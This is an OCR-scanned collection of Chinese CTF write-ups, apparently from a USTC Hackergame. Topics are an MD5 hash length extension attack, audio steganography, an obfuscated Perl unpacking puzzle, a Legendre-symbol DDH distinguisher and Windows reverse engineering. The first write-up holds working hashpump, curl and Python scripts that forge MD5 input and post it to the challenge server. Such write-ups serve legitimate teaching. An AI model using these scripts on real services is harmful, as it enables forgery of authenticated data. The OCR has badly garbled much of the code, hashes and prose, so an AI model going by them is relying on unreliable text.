~/guess $ ./hashpump -k 32 -s "$HASH" -d "" -a 

Input Data: a1158d0f03312db755457561a39582aa 

NX80NX00NX00NX0OONXOONXOONXOONXOONXOONXOONXOONXOONXOONXOONXOONXOO 

NX00NX00NX00NX0O0NX0O0NXO0NXOONXOONXOONXO1NXO0NXO0OONXOO0NXOONXOONXOO 

a 

-/guess $ curl --cookie cookie.txt --cookie-jar cookie.txt 
/hack.lug.ustc.edu.cn/dynamic/4/" -X POST -d "text=%80%0( 





wsl@MSI-GS70: ~/proj/guess = 口 x 


<div> 


: <code>b3aa72877784352438ad3adc7/fcf3e85</code> 
<code> B </code></p> 
: <code>qDO8RzAt4BmLE6nWNOBRgo5KV50q0Jae Bl «/code»«/p» 


> 


f ! Combo 加 一 </b></py> 


fr 的 MD5: <code>c8fbd3cb9d7a2caa4377d6ec9e0a6372</code></p> 


"" method-"POST"» 
: input readonly id-"text" type-"text" name-"text" value-"" size-" 


: </p> 


«label»«input name-"choice" type="radio" value-"0" ch /> 偶数 </label> 
<label><input name-"choice" type="radio" value="1" /> / 
</p> 
<p><input type="submit" name-"submit" value="{ii22"></p> 
</form> 
</div> 


<script> 
var text = "" 
var possible "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi jklmnopqrstuvwxyz0123456789" ; 
for(var i=®;i<32;i++) 
text+=possible.charAt(Math.floor(Math.random()*possible.length)); 
document.getElementById("text").value-text; 
</script> 
</body> 
</html> 
usl@MSI-GS70: 





非常 好 ， 和 HashPump 算 出 来 的 MD5 一 模 一 样 。 


准备 工作 完毕 ， 下 面 开 始 写 代码 : 


#!/bin/bash 


COOKIE=cookie.txt 
URL-http://hack.lug.ustc.edu.cn/dynamic/4/ 
LINE-48 


T TEXT-9?680?60 0960 0760 0760 0760 0760 0260 0260 0260 0260 0260 0260 0260 0760 0760 0760 0760 0960 O 
26009260 0760 0760 0760 0260 0760 1260 0260 0260 0260 02600760 0 a 

T CHOICE-0 

T. SUBMIT -?6E6?68F969 O%XE4%BA%A4 


submit() { 

curl --cookie $COOKIE --cookie-jar $COOKIE "$URL" -X POST -d " 
text-$T TEXT&choice-$T CHOICE&submit-$T SUBMIT" 2>/dev/null 
} 


work() { 
FORM="$(submit)" 
FLAG=$(echo "$FORM" | grep -oE "flag\{[X{}]+\}") 
if [ $? -eq © ]; then 
echo "$FLAG" 
exit 0 
fi 
KEY=$(echo "$FORM" | sed -n "${LINE}p" | grep -oE "[0-9a-f]{32 
+") 
HASH-$(:|hashpump -k 32 -s "$KEY" -d "" -a "a" | grep -oE "[0- 
9a-f]{32}") 
HASHNUM=${HASH: 31:1} 


case $HASHNUM in 
0|2]4]6|8|a|c|e) T_CHOICE=0;; 
1|3|5|7|9|b|d|f) T_CHOICE=1;; 
t) oun 


esac 


while :; do work; done 


运行 一 会 后 就 输出 了 flag: 


flag[8fc66cd05d6bc2bc251182e08fefbfc9) 
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MD5 原 理 利用 分 块 计 算 的 特性 构造 特殊 的 字符 串 使 得 已 知 MD5 参 与 下 一 块 计 算 
代码 : 


(md5 原 版 实现 搬运 自 https://github.com/thereal1024/python-md5- 
collision/blob/master/md5.py ) 


#!/usr/bin/env python3 


"""An implementation of MD5 that exposes internals and is direct 
ly built up 
from mathematical primitives from the MD5 specification. 


It achieves about 500KB/s, or 1/1000x of GNU md5sum. 

Thus, this is not an implementation great for larges amounts of 
hashing. 

Instead, the point is access to internals.""" 


. date = '2015-07-02' 
version = 0.8 


import math 
import binascii 


# util 

bin to words = lambda x: [x[4 * i:4 * (i + 1)] for i in range(le 
n(x) // 4)] 

words to bin - lambda x: b''.join(x) 

word to int - lambda x: int.from bytes(x, 'little') 

int to word = lambda x: x.to bytes(4, 'little') 

bin to int - lambda x: list(map(word to int, bin to words(x))) 
int to bin - lambda x: words to bin(map(int to word, x)) 
mod32bit = lambda x: x % 2 ** 32 

rotleft = lambda x, n: (x << n) | (x >> (32 - n)) 


# initial state 
IHVO HEX = '0123456789abcdeffedcba9876543210' 
IHVO = bin to int(binascii.unhexlify(IHVO HEX.encode())) 


# parameters 
BLOCK SIZE = 64 # 512 bits (64 bytes) 
ROUNDS - BLOCK SIZE 


4 addition constants 
AC = [int(2 ** 32 * abs(math.sin(t + 1))) for t in range(ROUNDS) 
] 


# rotation constants 
RE = (7%, 12 d 2217274 iS 914. 20] 4 Ae 4 11 16. 23] 


* 4 * [6, 10, 15, 21] * 4 


# non-linear functions 


F = lambda x, y, 2: (x & y) ^ (~x & 2) 
G = lambda x, y, zZz: (2 & x) ^ (~z & y) 
H = lambda x, y, z: x^y^zZZ 

I = lambda x, y, z: y ^ (x | ~-z) 


Fx = [F] * 16 + [G] * 16 + [H] * 16 + [I] * 16 


# data selection 

M1 = lambda t: t 

M2 = lambda t: (1 +5* t) % 16 

M3 = lambda t: (5 2 * t) % 16 

M4 = lambda t: (7 * t) % 16 

Mx = [Mi] * 16 + [M2] * 16 + [M3] * 16 + [M4] * 16 
Wx - [mxi(i) for i, mxi in enumerate(Mx)] 


# iterations and function composition 
RoundQNext = lambda w, q, i: mod32bit( 

q[0] + rotleft(mod32bit(Fx[i](q[0], q[1], q[2]) + dia] + AC[ 
i] + w[Wwx[i]]), RC[i])) 
DoRounds = lambda w, q, i: DoRounds(w, [RoundQNext(w, q, i)] +q 
[:3], i * 1) if (i « ROUNDS) else q 
MD5CompressionInt = lambda ihvs, b: [mod32bit(ihvsi + qi) for ih 
vsi, qi in zip(ihvs, DoRounds(bin to int(b), ihvs, 0))] 
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arrSh = lambda 
arrUs = lambda 


[x[1], x[2], xI[3], x[0]] 
[x[3], x[0], x[1], x[21] 
MD5Compression = lambda ihv, b: arrUs(MD5CompressionInt(arrSh(ih 


v), b)) 


x x 


class MD5: 
"""Implementation of MD5 


Expected outputs: 

>>> MD5(b'').hexdigest() 

' dá1d8cd98f00b204e9800998ecf8427e' 

>>> MD5(b'a').hexdigest() 

'0cc175b9c0f1b6a831c399e269772661' 

>>> MD5(b'abc').hexdigest() 

'900150983cd24fb0d6963f7d28e17f72' 

>>> MD5(b'message digest').hexdigest() 

'f96b697d7cb7938d525a2f31aaf161d0' 

>>> MD5(b'abcdefghijklmnopqrstuvwxyz').hexdigest() 

' cafcd3d76192e4007dfb496cca67e13b' 

>>> MD5(b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef ghi j k1mnopqr stuvwx 
yz0123456789' ).hexdigest() 

' d174ab98d277d9f5a5611c2c9f419d9f' 

>>> MD5(b'12345678901234567890123456789012345678901234567890 
123456789012345678901234567890' ).hexdigest() 

'57edf4a22be3c955ac49da2e2107b67a' 


def _ init (self, data=None, IHVO_HEX="0123456789abcdeffedcb 
a9876543210"): 


self. ihv = bin to int(binascii.unhexlify(IHVO HEX.encod 
e())) 

self.bits = © 

self.buf = b'' 

if data: 


self.update(data) 


def update(self, data): 
self.bits += len(data) * 8 
self.buf += data 
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while len(self.buf) >= BLOCK_SIZE: 
to_compress, self.buf = self.buf[:BLOCK_SIZE], self. 
buf [BLOCK SIZE:] 
self. ihv - MD5Compression(self. ihv, to compress) 


def set ihv(self,str): 
self. ihv - bin to int(binascii.unhexlify(str[:32].encod 


e())) 


def digest(self): 
4 total reseved bytes 
total bytes - (self.bits // 8) 


4 we deduct 1 extra byte for the 1 bit from the zero pad 
ing length 
zerolen = (56 - (total bytes + 1)) % 64 


pad = bytes([0x80] + [0] * zerolen) + (total bytes * 8). 
to bytes(8, 'little') 


temp = MD5() 

temp. ihv - self. ihv 
temp.update(self.buf + pad) 
digest value - temp. ihv 


return int to bin(digest value) 
def digest2(self): 
4 total reseved bytes 


4 we deduct 1 extra byte for the 1 bit from the zero pad 
ing length 
zerolen = (56 - ((self.bits // 8) + 1)) % 64 


#pad = bytes([0x80] + [0] * zerolen) + (total bytes * 8) 
.to bytes(8, 'little') 
pad=b'' 


temp = MD5() 
temp. ihv = self. ihv 
temp.update(self.buf + pad) 


def 


def 


def 


def 


digest_value = temp._ihv 


return int_to_bin(digest_value) 


hexdigest (self): 

return binascii.hexlify(self.digest()).decode() 
hexdigest2(self): 

return binascii.hexlify(self.digest2()).decode() 


ihv(self): 
return int to bin(self. ihv) 


hexihv(self): 
"Get the current IHV in hex 


>>> MD5().hexihv() == IHVO HEX 

True 

>>> MD5(b'test').hexihv() == IHVO HEX 

True 

>>> MD5(b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef ghi j k1mnopqrst 


uvwxyZz0123456789!?').hexihv() 


SEC Email: 


le') 


'9d39fa2529070110ab7f132e7a9cacf3' 


return binascii.hexlify(self.ihv()).decode() 


import requests,bs4,re 


s-requests.Session() 


for 


i in range(0, 30): 


res=s.get("http://hack.lug.ustc.edu.cn/dynamic/4/") 
soup-bs4.BeautifulSoup(res.text, 'lxml') 

code=soup. find_all("code")[-1].text 

# origin code-b'GoCjI2uWceMlf7BJKEbAF1GHP186s8j9' 

4 code=MD5(origin_code).hexdigest() 

4 print(code) 

di = D' \x80" + b'XxoOQ' * 29 t (827 8).to-bytes(8, “Litt 


q2- b'\x80'+b'\x00' * 55+(64 * 8).to bytes(8, 'little') 
4 mi = MDb5(origin code + q1) 
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mir=mi.hexdigest2() 
print(mir) 


mm-MD5 (origin code+q1) 


dk dt Gb Gt + 


print(mm.hexdigest()) 


m2-MD5(q2, code) 
m2r=m2.hexdigest2() 
# print(m2r) 


if (m2r[-1].isalpha()): 
choice=(ord(m2r[-1])-97)%2 
else: 
choice=int(m2r[-1] )%2 


ans_res=s.post("http://hack.lug.ustc.edu.cn/dynamic/4/", 
data={"text":q1, "choice" :choice, "submit":" 提 交 "}) 
print(re.search( 'Combo : .*?<',ans_res.text)) 
res=s.get("http://hack.lug.ustc.edu.cn/dynamic/4/") 
print(res.text) 


永恒 的 东 内 


邓 龙 16% 
题目 是 一 个 音频 文件 ， 打 开发 现 是 熟悉 的 校歌 《永恒 的 东风 》。 作 为 一 个 又 红 又 专 
的 选手 ， 仔 细 聆 听 发 现 音 乐 里 似乎 参 杂 了 频率 很 高 的 有 规律 的 滴 滴 声 。 


随意 用 一 个 音频 处 理 软件 打开 (我 用 的 是 Adobe Audition cc) ， 波 形 没什么 特别 
的 ， 猜 测 是 高 频 部 分 有 问题 。 利 用 软件 查看 频谱 频率 ， 如 下 图 : 





14kHz 和 15kHz 两 个 频率 明显 调制 过 的 迹象 。15kHz 部 分 是 距离 相等 的 脉冲 ， 猜 测 
作为 时 钟 使 用 。 而 14kHz 部 分 的 频谱 显然 草 含 了 信息 。 又 发 现 flag 的 开头 字母 f 的 
ASCIl 码 (01100110) 与 14kHz 开 头 部 分 一 致 。 按 照相 同方 式 解 码 ， 得 到 。 


CancerGary 17 级 校外 同学 


高 频 部 分 写 入 了 二 进 制 的 标记 


( 手 扒 到 眼睛 次 ) 
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X B : djh 
这 题 出 的 比较 随意 , 也 非常 简单 , 大 概 给 大 家 讲 一 讲解 题 思路 吧 . 也 没 啥 好 深究 的 . 


首先 , 拿 到 一 个 不 知道 是 啥 的 文件 , 先 binwalk 一 下 : 


* rootQDDB ~/Desktop/total_mess > binwalk output.bin 


DECIMAL HEXADECIMAL DESCRIPTION 
0 0x0 Zlib compressed data, best compres 
sion 


年 一 看 , 觉得 就 是 一 个 zlib 文 件 了 . 


* rootQDDB ~/Desktop/total_mess > printf "\x1f\x8b\x08\x00\x00\x 
00Nx00Nx00" |cat - output.bin |gzip -dc 


# Hint: First you need to determine the programming language we 

use in this script. 

eval unpack u=>q{_=7-E($U)344Z.D)A<V4V-#L*=7-E($-R>7!T.CI-;V1E.C 
I#0D, ["G5S92!$:6=E<WOZ.E- (03L*=7-E($-0_;7!R97-S.CI:<W1D.PIU<V4@0 
V]M«')E«W,Z.EIL:6(["G5S92! )3SHZ1FEL93L*=7 -E($91;&4Z.E-L=7)P_.PH* 
<W5B(&)A<V4V-&X@>PH) ; 7DQ* " 1F ; &%G+" ^ DZ&EMO97, 1(#T@O%\ [ " GEF ; W(H*#$N 
+B1T : {UE<RDI>PH)_"21F; &%G(#T@96YC; V1E7V)A«VAV -  ODOFQA9RPQ)R«I . PH 
)?6H)«F5T-7)N("1F;&94G.PI]"QIM»2'D9FQA 9R'](')E861?9FEL92QG9FQA9R 
YT2'0G*3L*; 7DQ) '1H:7, @/2! R96%D7V9I;&AH)# ` I. PHD9FQA9R' ] (&)A_<VAV- 
&XH8F%SY38T ; BAB87 -E- C1N* " 1F; &?6G-" ^ X*2PQ. '"DL(ZQI.PHD-&AI«R']($-0; 
7!R97-S.CI:;&EB .CIC;VUP«F5S«RQOQD-&AI«RPQ."D["QIM22' D»G-T9"'Q("'Q 
(#T@<W5B<W1R*$-0; 7!R97-S.CI:<wW1D.CIC_; VUP<F5S<RAB87 -E-C1N*"1F ; &96 
G-"^X*2PQ. DL(Z4QL("TX*3L*;7DQ)'IL:6(Q(" Q("^](' -U8G-T<BA#_; VUP<F 
5S<SHZ6FQI8CHZ8V ]M«' )E<W, HAF%S938T ; BOD9FQA9RPQ . "DL (#@I+" X+" M." 
D["FUY("1K97DQ ("'Q("'Q/2!S-6)S-' (H1&EG97- T.CI32$$Z.G-H83(U-BQD» 
G-T9"^]?B!Y-RNOBRDL(ZQL("TX*3L*;7DQ )&EV("^Q("^Q("^](' -U8G-T<BAS 
:6-E«WOZ .E-(03HZ«VAA, CAV*"1Z; &EB( ZU^( ' DOBRNO*2PQ."PQ-30I .PIM22' 
D8VEP:&5R(" Q(4TQOW)Y«'OZ.DUO9&A4Z .D-" ORT^; F5W*"=!15, G*3L*; 7D@)&5 
N8W)Y«'1bE9"'^] ("1C:7!H97(M/F5N8W)Y«'0H)&9L86«L ( " 1K97DL ( "LI-BD[ "Q 
IM»2'D;W5T«'5T(4TQ24NZ.D9I;&4M/FYE -RQG;W5T«'5T*F)I;B«L("«^)RD[" 
B10-71P-70M/F)I;FUO9&4["B10-71P-70M/G!R:6YT*"1T:&ES*3L* )&]U-' !U 
="TA<')1I;GOH) 'IS=&0I. PHD; W5T<'5T+3YP<FEN="@D96YC<GEP=&5D* SALIG JU 
z'IU-"TA^«')I*;GOH)'IL:6(I.P) 


gzip: stdin: invalid compressed data--crc error 
gzip: stdin: invalid compressed data--length error 


emmmm 解压 出 来 的 东西 很 小 , 远 够 不 上 275KB HK). 看 来 后 面 还 有 东西 . 
先 看 看 解压 出 来 的 东西 . 题目 提醒 我 们 这 可 能 不 是 最 常见 的 语言 ... 如 果 没 有 经 验 , 可 
以 把 不 熟悉 的 语言 都 拿 来 试 一 试 . 有 经 验 的 话 很 容 钨 看 出 来 . RA, 如 果 能 看 出 来 后 
面 的 编码 是 Uuencode 的 话 , 直接 Google 一 下 "unpack uuencode" 就 能 发 现 这 是 


perl #5. 


将 eval A print ,可 以 得 到 混淆 前 的 代码 : 


use 
use 
use 
use 
use 
use 
use 


sub 


MIME: :Base6d; 
Crypt: :Mode: :CBC; 
Digest: : SHA; 
Compress: :Zstd; 
Compress: :Zlib; 
IO::File; 
File::Slurp; 


base64n ( 
my ($flag, $times) = Q ; 
for((1..$times)){ 

$flag = encode_base64($flag, ''); 


j 

return $flag; 
} 
my $flag = read_file('flag.txt'); 
my $this = read_file($0); 


$flag = base64n(base64n(base64n($flag, 8), 8), 8); 
$this = Compress::Zlib::compress($this, 8); 


my $zstd 


substr (Compress: :Zstd: :compress(base64n($flag, 


jr 8), 8, -8); 


my $zlib = substr(Compress::Zlib::compress(base64n($flag, 
), 8), 8, -8); 

my $key = substr(Digest::SHA::sha256($zstd =~ y///c), 8, 
8); 

my $iv = substr(Digest::SHA::sha256($zlib =~ y/c//), 8, 
8); 

my $cipher = Crypt: :Mode: :CBC->new( 'AES'); 


my $encrypted = $cipher->encrypt($flag, $key, $iv); 


my $output = IO::File-»new('output.bin', '>'); 


$output->binmode; 
$output->print($this); 
$output->print($zstd); 
$output->print($encrypted); 
$output->print($zlib); 


代码 非常 清晰 , 并 没有 再 做 什么 处 理 . 没有 学 过 Perl 的 同学 也 可 以 基本 猜 出 来 代码 
的 意思 .除了 两 行 $zstd =~ y///c 和 $zlib =~ y/c// 以 外 . 这 两 行 代码 的 含 

义 可 以 通过 Google 和 实验 的 方法 解决 , 一 个 是 $zstd 的 长 度 , 另 一 个 是 $zlib 
中 c 的 个 数 . 


整理 一 下 , 大 概 就 是 这 个 output.bin 中 存放 着 四 个 东西 : 


e 代码 本 身 的 zlib 

o flag 经 Base64 编码 32 次 再 zstd 压缩 , 再 去 掉 首 尾 的 数据 

° 经 Base64 编码 24 次 再 用 $zstd 的 长 度 和 $zlib 中 c 的 个 数 来 加 
密 的 结果 

e flag 经 Base64 编码 32 次 再 zlib 压缩 , 再 去 掉 首 尾 的 数据 


两 种 考虑 : 


。 如 果 能 还 原 压缩 数据 的 格式 , 直接 解压 即 可 
。 如 果 不 能 , 把 压缩 数据 当 作 纯 未 知 量 , 我 们 要 找 出 $flag 加 密 后 的 位 置 


这 里 我 们 走 第 二 条 路 . 因为 它 比较 简单 且 显然 . 


首先 估计 flag EE, 很 好 办 , 自己 新 建 flag.txt, AMIRI, 然后 运行 这 个 脚本 , 看 生 
成 output.bin 文件 的 大 小 , 并 和 原文 件 比 较 . 这 样 可 以 把 flag 长 度 限定 到 一 个 小 范 
围 . 应 该 注意 到 这 个 范围 内 的 flag 对 应 的 $flag 的 长 度 , 是 精确 相等 的 . 这 样 我 们 
就 拿 到 了 $flag 的 长 度 . 


然后 估计 $zstd 的 长 度 . 如 果 还 按照 上 述 方法 的 话 , 误差 会 比较 大 . 穷 举 时 间 可 能 
会 比较 久 . 我 们 这 个 时 候选 择 计 算 output.bin x fF 85 HM. 因为 考虑 到 压 文件 往往 有 
自己 的 结构 , m EP Ja BEK A 85) 3 26,99. LAE N BA. 


使 用 binvis 打开 , 将 curve 选择 为 scan, *T VA SIMA TAAR EE MORA. 部 分 是 
因为 zstd 压缩 格式 的 内 部 结构 . ee 我 们 切换 到 byteclass 模式 , 可 以 注意 到 zstd 
部 分 的 数据 里 面 0x00 的 数目 非常 多 . 根据 这 个 特点 , 我 们 能 够 将 $flag 的 起 始 位 
置 精确 估计 一 下 , 比如 0x1d930 - 0x1d970. 


根据 $flag 的 起 始 位 置 , 我 们 能 够 得 到 $zstd 的 长 度 和 $zlib 中 c 的 个 
数 . 并 且 注 意 到 , 任何 一 个 字符 串 , 在 经 过 很 多 次 Base64 编码 之 后 , 其 开头 都 会 收敛 
到 常量 

"Vmowd20yUX1VWGXWVOd4V1YWZDRWMV13WKRSVO1WDDNXa1 JTVjAXV2JETIhhMUDU.. 
." ,利用 这 个 特性 , 我 们 可 以 计算 我 们 估计 的 起 始 位 置 是 否 正确 . 


穷 举 的 空间 很 小 , 耗 时 也 不 多 . 写 好 脚本 一 跑 就 出 来 了 . 没 做 出 来 的 同学 可 以 再 试 试 . 
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三 教 许愿 池 


此 题 涉 及 DDH Assumption : 
https://en.wikipedia.org/wiki/Decisional Diffie-Hellman assumption 
根据 wikipedia 提供 的 信息 ， 可 以 知道 


one can efficiently compute the Legendre symbol of g^(ab), giving a 
successful method to distinguishg*{ab}from a random group element. 


即 ， 在 题目 这 样 的 条 件 下 ， 我 们 使 用 勒 让 德 符号 ， 有 一 定 几率 可 以 状 别 出 gab} 
( 非 随机 的 一 个 ) 和 goe} (AM ALA AR +) 


具体 实现 如 下 (python) : 


def legendre_symbol(a, p): 
ls = pow(a, (p - 1) // 2, p) 
return -1 if ls -- p - 1 else ls 


def distinguisher(gx,gy, 91,92): 


x = 1 * legendre symbol(gx, p) == -1 
y = 1 * legendre symbol(gy, p) == -1 
a = 1 * legendre symbol(gi, p) == -1 
# b = 1 * legendre symbol(g2, p) == -1 


ans.append(1 if x * y == a else 0) 


其 中 x,y, a,b 分 别 代 表 了 gx, gy, g1, g2 这 些 指数 项 的 指数 的 奇偶 性 。 


由 于 可 爱 的 cwk 学 长 精心 设计 ， 使 得 gl, g2 的 指数 奇偶 性 总 是 不 同 ， 所 以 我 们 可 
以 完全 辨别 出 所 有 的 challenge 。 


最 后 ， 我 们 得 到 ans 数组 ， 变 为 hex 即 可 得 到 答案 : 


hex(int(''.join([str(x) for x in ans]), 2))[2:] 


式 明 远 17 级 (校内 第 一 个 做 出 的 同学 ) 


首次 尝试 

RAG Ag 先 把 X 算 出 来 不 就 简单 了 ! 
看 了 一 下 数据 长 度 ...... 放弃 

二 次 尝试 

试图 用 g^xX 和 g^y 的 初等 运算 做 出 g^xy 


发 现 这 是 g^xy 不 是 g^(x+y) 


吸取 了 第 一 次 失败 的 经 验 ， 失 败 的 原因 主要 是 要 遍历 p-1 才 能 保证 找到 xX， 这 大 多 
了 ， 而 这 种 大 数 运 算 唯 一 比较 快 的 操作 是 指数 运算 。 


所 以 想到 考虑 g^xr，g^yr 和 g^xyr > g^xyrr 。 
然而 这 并 没有 什么 卵 用 。 


突然 发 现 g 是 原 根 ( 代 码 中 有 说 )， 则 令 r=(p-1)/q， 其 中 q 是 p-1 的 小 因子 ， 就 可 以 通过 
观察 gAxrfeg Ayr 判 斯 X > y 模 q 的 余数 。 首先 q 可 以 等 于 2 ， 我 们 就 排除 了 一 半 的 数据 
其 次 假设 q 可 以 等 于 3， 我 们 又 能 排除 三 分 之 二 的 数据 ..…... 等 等 。 


py 计算 发 现 p-1 在 1000000 以 内 只 有 一 个 因子 :2 


起 床 。 

n+1 次 尝试 

先 把 一 半数 据 排 了 再 说 吧 。 
AS ...... 就 没有 然后 了 。 


30min 实验 加 编 完 。 


付 佳 伟 ATA 
这 明摆着 是 一 道 数 学 题 啊 。。“。 还 是 数论 。。。。。。 


先 看 代码 查 查 背景 ，$g$ 是 $imathbb{Z} p*$455/& 4E ek $g^1$ ^ $g^2$> ^ 
$g^{p-1}$ 是 $1$、$2$、...... 、$p-1$ 的 一 个 排列 。 于 是 当 $g^x\equiv d\ \ 
(\mathrm{mod}\ n)$ 时 ， 称 $x$ 是 以 $g$ 为 底 ，$d$ 的 离散 对 数 ， 记 为 
$x=\mathrm{Ind}_g{d}$。 再 查 更 多 的 资料 发 现 ， 类 似 于 RSA 的 基础 假设 : 大 质数 在 
有 意义 的 时 间 内 无 法 分 解 ， 同 样 的 离散 对 数 也 无 法 求解 ， 所 以 这 题 让 我 们 求 56 个 离 
散 对 数 ， 肯 定 是 不 可 能 的 ， 想 想 别 的 办 法 。 


注意 到 ， 根 据 费 马 小 定理 ， Ng ID 1}\equiv1\ \ (\mathrm{mod} p)$ ， 而 $g$ 又 
z$Wnathbb[Z). p^*$ 9 RR > 3x v4 $g^Mrac(p-1H42)vequiv-1MY Mi dn 

p)$， 所 以 我 们 a oa 1}H2}$ 和 $(g^y)^\frac{p-1HM2}$ 的 结果 判断 
$x$ 和 $y$ 的 奇偶 性 。 这 是 个 不 错 的 猜想 ， 我 们 先 试 试 : 


=(p-1)//2 


def parityCheck(n): 
= pow(n, q, p) 
if r == 1: 
return © 
if r ==p - 1: 
return 1 
return -1 


def distinguisher (9X, gy 91,92): 
px = parityCheck(gx) 
py = parityCheck(gy) 
pi parityCheck(g1) 
p2 
print(px, py, pl, p2) 
exit(®) 


parityCheck(g2) 


最 后 那个 exit(9) 是 为 了 让 程序 对 第 一 组 数据 运行 完 之 后 就 先 退出 ， 毕 竞 现 在 只 
是 试 试 数据 。 


输出 : 


@ 116 


大 


看 起 来 gi 和 g2 关于 $\mathbb{Z}_p^8 的 离散 对 数 分 别 是 一 奇 一 偶 ， 后 面 再 测试 
一 下 ， 发 现 全 部 56 组 数据 的 g1 和 g2 ARE GE (HI) o ABA BAA BSH > HR 


一 下 代码 : 
def distinguisher (gx, 9y, 91,92): 

px = parityCheck(gx) 

py = parityCheck(gy) 

pi = parityCheck(g1) 

p2 = parityCheck(g2) 

ans = px * py 

if ans == pi: 
print(1, end='') 

if ans == p2: 
print(®, end='') 


运行 输出 : 


01110100111011100001111110110001001000011010101100100001 


我 想 手动 转换 这 么 点 十 六 进 制 数 应 该 不 算 太 难 吧 ， 起 码 比 写 个 程序 用 的 时 间 短 。 


(BEE: 这 孩子 或 许可 以 用 来 当 ALU) 


74eeifb121ab21 


好 了 ， 提 交 flag 吧 


flag{74ee1fb121ab21} 


这 道 题 是 我 比较 用 心 出 的 一 道 题 , 前 前 后 后 大 概 花 了 三 四 天 , 目的 主要 是 为 了 给 大 家 
枯燥 无 味 的 逆向 过 程 中 增加 少许 趣味 性 , 希望 大 家 能 喜欢 . 题目 本 身 并 不 难 , 做 出 来 
的 同学 花 的 时 间 绝 对 比 我 出 题 用 的 时 间 要 短 ， 可 以 说 是 非常 失败 的 代码 保护 了 
2333333. 


KP AK de 
BASE 


我 个 人 比较 懒 . 所 以 官方 答案 只 说 思路 , 不 会 把 每 一 步 用 到 的 脚本 啊 堆 图 啊 之 类 的 都 
放出 来 (这 里 祈祷 一 下 那些 做 出 来 的 大 佬 们 能 给 出 详细 的 WP). 但 是 考虑 到 会 看 我 这 
种 辣 鸡 写 出 来 的 WP AE PRAHA, 我 会 尽量 把 步骤 说 的 细 一 点 . 如 果 同 学 们 有 
兴趣 的 话 , 可 以 跟着 我 的 思路 走 一 走 , 把 这 道 题 做 完 . 


准备 阶段 


不 知道 大 家 拿 到 一 道 Windows 逆向 题目 之 后 第 一 步 会 干什么 . 有 人 喜欢 直接 拖 IDA, 
有 人 喜欢 先 调 试 , 有 人 喜欢 先 用 PEID 扫 一 扫 , 有 人 喜欢 先 跑 跑 看 这 道 题 是 干 嘛 的 . 
但 是 对 于 我 来 说 , 拿 到 一 个 exe 的 第 一 件 事 ... 当然 是 传 到 VifrtsTetal- 上 扫描 一 遍 啦 - 


然而 结果 很 蛋 疼 , 4/65 EA, 其 中 Symantec 的 扫描 结果 还 是 HighConfidence 
(Ar). 所 谓 防 人 之 心 不 可 无 嘛 , 虽然 北向 题 是 一 个 病毒 的 概率 不 大 , 但 是 这 时 候 有 
必要 确认 一 下 , 说 不 定 自己 被 其 他 选手 中 间 人 攻击 了 呢 : 比如 检查 一 下 , 主办 方 的 网 
站 是 不 是 HTTPS 啊 (不 是 ), 有 没有 给 文件 Hash 啊 (AA), 文件 的 Hash 有 没有 被 
主办 方 的 私 钥 签 名 啊 (不 存在 的 ). 


往往 这 个 时 候 , 我 的 心里 就 会 名 一 名 出 题 人 (也 就 是 我 自己 ), 然后 打开 虚拟 机 . 逆向 
使 用 庶 拟 机 的 好 处 有 很 多 , 比如 调试 到 一 半 的 时 候 打 一 个 快照 ,之 后 可 以 随时 回复 这 
个 状态 (前 提 是 你 有 一 块 好 的 SSD). 虽然 Windbg 已 经 支持 了 Time Travel 
Debugging, 但 是 毕竟 会 用 Windbg 的 都 是 大 佬 . 我 们 这 种 萌 新 只 好 用 这 种 土方 法 啦 . 


关于 虚拟 机 , 我 还 想 说 一 句 , 推荐 大 家 使 用 VirtualBox 而 不 是 VMware. 特别 是 对 于 
那些 装 了 VMware 还 不 想 升级 的 同学 , 这 里 提醒 一 下 , 虚拟 机 逃逸 的 漏洞 每 年 都 有 ， 
比如 前 几 个 月 对 VMware 12.5.5 之 前 的 版 本 都 有 效 的 漏洞 EXP, 时 就 公布 到 Github 
上 了 . 


当然 啦 , 我 知道 这 道 题 是 是 我 自己 写 的 , 所 以 不 太 在 乎 这 个 扫描 结果 . KV, 我 就 打 
开 了 一 款 类 似 于 PEID 的 静态 检查 软件 , StudyPE+. 结合 VirusTotal 的 结果 , 从 最 宏 
观 的 角度 度 看 一 看 这 个 文件 , 大 概 是 多 少 位 啊 , 有 没有 加 壳 啊 , 有 没有 TLS Callback 
N, 入 口 点 有 没有 被 修改 啊 , 有 没有 RWE 权限 的 区 段 啊 , 之 类 的 . 


很 好 , 似乎 又 是 一 个 普 普 通通 的 程序 , 然后 拖 进 IDA, 看 了 看 没什么 可 疑 的 地 方 , 先 跑 
一 跑 试 试看 . 

就 一 句 话 "Please input the flag:", 随便 输 了 几 个 字 , 输出 "Nope, nope..." 然后 退出 
T. 我 就 喜欢 这 种 简单 粗暴 的 程序 , 哪个 人 出 的 题 , 我 要 表扬 一 下 (wwwwwarai). 


结束 阶段 


用 IDA 逆向 程序 , 多 半 首 先 找 main BA. dT T, 可 是 main AAA RAK, 你 
知道 吗 : 


e IDA7.0 自动 识别 (R, 这 也 算 ? 

e 经 验 问题 GT ET Rit... 

e 搜索 字符 串 (Shift-F12 + X + F5 三 连 见 过 没 ? 

e 其 它 解 法 (你 们 这 群 家 伙 不 知道 switch 要 有 default %... 


9L, AF] main Ağ, 一 看 sub_46A9DE() 可 能 就 是 printf() (实则 不 然 )， 
按 N 重 命名 为 printf, 4 Y 把 函数 原型 改 成 int sub 46A9DE(char *ai, ...) 
便于 分 析 堆 栈 . 


然后 看 一 看 流程 , 大 概 是 最 多 读 入 25 个 字符 , 写 到 数组 里 面 , 传 入 sub_401064() , 
再 和 一 串 字 符 串 比较 . 好 , 那么 主要 的 处 理 一 定 是 在 sub 401064() €f. 


rd “AK, 发 现 自动 切 回 到 了 Text View, 如 果 试图 进行 F5, IDA 6.8 会 卡 好 久 然 

得 出 一 个 不 错 的 结果 , IDA 7.0 会 直接 报错 too big function, 当然 把 IDA 
7.0\cfg\hexrays.cfg 中 的 MAX FUNCSIZE 参数 改 大 一 点 也 能 F5. 但 是 我 们 这 
里 假设 不 使 用 F5 AK, 只 会 F5 的 萌 新 永远 是 萌 新 (就 像 我 , 大 家 不 要 学 我 ). 


大 致 看 一 看 汇编 , 多 数 指令 都 很 相似 , 关于 跳 转 的 指令 只 有 两 条 : jmp byte ptr 
ds:off_46A3A4[edx*4] 和 jmp $+2 .进入 到 off_46A3A4 ,发 现 又 是 一 大 堆 
loc, 看 来 是 一 个 跳 转 表 , 估计 对 应 一 个 switch. jmp $+2 没 啥 用 , 属于 垃圾 指令 . 


